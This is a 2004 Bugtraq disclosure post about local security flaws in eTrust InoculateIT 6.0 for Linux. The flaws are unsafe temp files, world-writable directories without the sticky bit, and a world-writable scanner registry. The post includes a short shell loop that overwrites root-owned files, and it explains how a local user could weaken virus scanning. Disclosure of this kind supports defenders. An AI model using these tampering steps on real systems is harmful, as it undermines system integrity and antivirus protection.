lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040209170955.32377.qmail@www.securityfocus.com>
Date: 9 Feb 2004 17:09:55 -0000
From: Rene <l0om@...luded.org>
To: bugtraq@...urityfocus.com
Subject: [local problems] eTrust Virus Protection 6.0 InoculateIT for linux




author: l0om  <l0om@...luded.org> 
software: eTrust Virus Protection 6.0 InoculateIT for 
linux 
 
local phun with etrust antivirus 6.0 inoculateIT 
linux 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
 
eTrust InnoculateIT 6.0 comes for the following OSes: 
-windows 95/98/ME 
-windows nt 4.0/2000 
-novell netware 3.x 4.x 5.x 
-lotus notes/domino 
-mircosoft exchange server 
-and finally linux (SuSE, RedHat, Caldera, Turbo 
Linux) 
 
eTrust is a antivirus program which can scan nearly 
every fileformat 
for viruses. i have installed the version for linux 
on my SuSE 9.0 system 
and noticed the following security flaws: 
 
 
1) possible symlink attacks in some scripts 
 
  by the way- the env variable $CAIGLBL0000 can be /
usr/local/eTrust/ for example. 
  however - the $CAIGLGL0000/tmp IS world writable... 
 
ino/scripts/inoregupdate 
######################## 
[...] 
tfn=$CAIGLBL0000/tmp/.inoreg.ns.$$ 
$NETSTAT -i 2>/dev/null | grep -v localhost > $tfn 
[...] 
 
 
scripts/uniftest 
################ 
local=$CAIGLBL0000/tmp 
local1=$CAIGLBL0000/scripts 
[...] 
    $CAIGLBL0000/bin/unips > $local/unips.$$ 
    awk -f $local1/uniftest.awk $local/unips.$$ 
    st_rc=$? 
    rm $local/unips.$$ 
[...] 
 
scripts/unimove 
############### 
           sed -e "s!$from!$to!g" $fn > /
tmp/.unimove.sed #<-- creats it now 
           diff $fn /tmp/.unimove.sed > /dev/null 
           if [ $? != 0 -a -s /tmp/.unimove.sed ]; 
then 
                mv /tmp/.unimove.sed  $fn 
           rm /tmp/.unimove.sed    # dels it if 
finished 
 
 
2) some directorys in /tmp dont have the sticky bit 
set 
an example: 
 
eTrustAE.lnx/tmp/.caipcs/ # ls -l 
drwxrwxrwx    8 root     root          240 2004-02-05 
09:58 . 
drwxrwxrwx    4 root     root          160 2004-02-09 
16:53 .. 
drwxrwxrwx    2 root     root           48 2004-02-05 
09:54 .file 
-rw-r--r--    1 root     root         4110 2004-02-05 
09:58 ipcrm.log 
drwxrwxrwx    2 root     root          856 2004-02-05 
10:48 .nob_event 
drwxrwxrwx    2 root     root         1168 2004-02-05 
10:48 .nob_mutex 
drwxrwxrwx    2 root     root           48 2004-02-05 
09:54 .nob_sem 
drwxrwxrwx    2 root     root          384 2004-02-05 
10:48 .sem 
drwxrwxrwx    2 root     root           80 2004-02-05 
10:48 .shm 
 
eTrustAE.lnx/tmp/.caipcs # ls -l .sem 
drwxrwxrwx    2 root     root          384 2004-02-05 
10:48 . 
drwxrwxrwx    8 root     root          240 2004-02-05 
09:58 .. 
-rw-------    1 root     root           20 2004-02-05 
10:01 3571729 
-rw-------    1 root     root            5 2004-02-05 
09:58 3702805 
-rw-------    1 root     root           25 2004-02-05 
10:01 3735574 
-rw-------    1 root     root           25 2004-02-05 
10:01 3768343 
-rw-------    1 root     root           15 2004-02-05 
09:58 3801112 
 
this directory includes values which are kinda 
sensetive. so only root can 
read or write them as we can see at this 
filepermissions. 
but as the upper directory /.sem has no sticky bit 
set and is world writeable. 
we can simple overwrite these files as the directory 
permissions are of a 
higher priority as the file permissions. this is the 
truth for a handful of 
directorys. 
for example: 
 
badass~:> phun() 
{ 
for i in `ls /usr/local/eTrustAE.lnx/
tmp/.caipcs/.sem`; do 
cp -f ~/myblankass.ascii /usr/local/eTrustAE.lnx/
tmp/.caipcs/.sem/$i 
done 
echo jupp 
} 
badass~:> phun 
jupp 
badass~:> 
 
 
3) world writeable 
 
with the linux version of etrust there come some 
directroys which we all know- the 
"registry". it seems like the whole registry key is 
world writeable: 
 
>find ./ -type f -perm -2 -print 
./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
macro_cure_action 
./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
scan_files 
./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
log_infected_files 
./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
specified_list 
./registry/hkey_local_machine/software/
computerassociates/scanengine/path/home 
./registry/hkey_local_machine/software/
computerassociates/scanengine/path/logs 
[...] 
 
they got the sticky bit set, therefore we cannot 
overwrite or delte them, but sometimes we can 
change sensetive values in the registry. for example: 
 
cat ./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
specified_list 
|COM|DLL|DOT|DOC|EXE|SYS|VXD|XLA|XLS|XLT|XLW|RTF|WIZ|
386|ADT|BIN|CBT|CLA|CPL|CSC|DRV|HTM|HTT|JS|MDB|MSO|
POT| 
PPT|SCR|SHS|VBS|VSD|VST|VSS|OCX|HLP|CHM|MSI|VBE|JSE|
PIF|BAT| 
 
this key contains a list of fileends which specifies 
what files should be scaned for a virus. 
a normal user can simply delte all values except one 
from this list, and can make the scanner pretty 
lame... 
furthermore there are worldwritable keys like 
"windows/currentversion", with keys which include the 
path to 
the normal binarys ("/usr/bin"). it may be possible 
to execute whatever you want on a reboot if you 
change 
the right keys in the right way. 
 
 
 
have phun! 
	feel phree! 
		life phat! 
 
YaCP - (Y)ast (a)nother (C)yber(P)unk 
 
--l0om 
--www.excluded.org 
 
 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ